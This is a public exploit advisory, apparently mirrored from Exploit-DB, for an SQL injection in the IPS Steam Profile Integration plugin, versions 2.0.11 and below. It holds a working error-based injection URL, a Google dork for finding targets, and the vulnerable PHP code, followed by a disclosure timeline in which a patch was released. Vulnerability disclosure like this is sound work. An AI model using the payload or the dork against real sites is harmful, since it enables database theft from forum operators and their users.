Steam Profile Integration 2.0.11 – SQL injection

  • 作者: DrWhat
    日期: 2017-03-13
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41617/
  • # Exploit Title: IPS Community Suite - Steam Profile Integration 2.0.11 and below SQL injection
    # Google Dork: inurl:tab=node_steam_steamprofile
    # Date: 13/03/2017
    # Exploit Author: DrWhat
    # Vendor Homepage: https://invisionpower.com/files/file/8170-steam-profile-integration/
    # Software Link: https://invisionpower.com/files/file/8170-steam-profile-integration/
    # Version: 2.0.11 and below
    # Tested on: Windows Server 2008 PHP7 & Linux Debian PH5.6
    
    # SQL Injection/Exploit: http://localhost/path/index.php?app=steam&module=steam&section=steamProfile&do=update&id=[USER_WITH_STEAM]%' OR EXTRACTVALUE(1001,CONCAT(0x3A,([QUERY]),0x3A)) AND '%'='&csrfKey=[CSRF_KEY]
    
    
    # Vulnerable code: /sources/Update/Update.php updateProfile() function
    # 532: $ids = array();
    # 533: $steamids = '';
    # 534: $select = "s.st_member_id,s.st_steamid,s.st_restricted";
    # 535: $where = "s.st_steamid>0 AND s.st_restricted!='1'";
    # 536: if($single)
    # 537: {
    # 538:$where .= " AND s.st_member_id='{$single}'"; // $single is $_GET['id'] pass through the router
    # 539:
    # 540:/* Is the member already in the database ? */
    # 541:$s = \IPS\steam\Profile::load($single); // IPS Profile model cleans the request and successfully executes the query
    
    
    # 573: $query = \IPS\Db::i()->select( $select, array('steam_profiles', 's'), $where, 's.st_member_id ASC', array( $this->extras['profile_offset'], 100), NULL, NULL, '011'); // Our payload is then later executed in the $where variable unsanitized
    
    
    # Timeline
    # 13/03/2017: Exploit discovered
    # 13/03/2017: Vendor notified
    # 14/03/2017: Vendor confirmed vulnerablity
    # 15/03/2017: Vendor releases patch 2.0.12
    # 15/03/2017: Public disclosure